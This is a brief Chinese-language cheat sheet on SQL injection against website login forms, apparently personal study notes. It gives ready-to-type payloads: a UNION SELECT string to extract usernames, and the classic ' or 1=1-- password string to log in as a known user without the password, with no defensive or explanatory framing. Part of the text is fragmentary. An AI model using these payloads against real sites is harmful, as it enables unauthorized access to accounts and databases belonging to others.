对于用户名与密码分开验证的网站：

‘ union select * from 表名-- //可查到用户名

数据库的任意密码。

对于用户名与密码在一条SQL语句的网站:

知道用户名，不知道密码   ，用户名：xxx   密码：‘ or 1=1-- key

不知道用户名，知道密码   ，用户名：‘ union select * from 表名--    密码：任意数

sql注入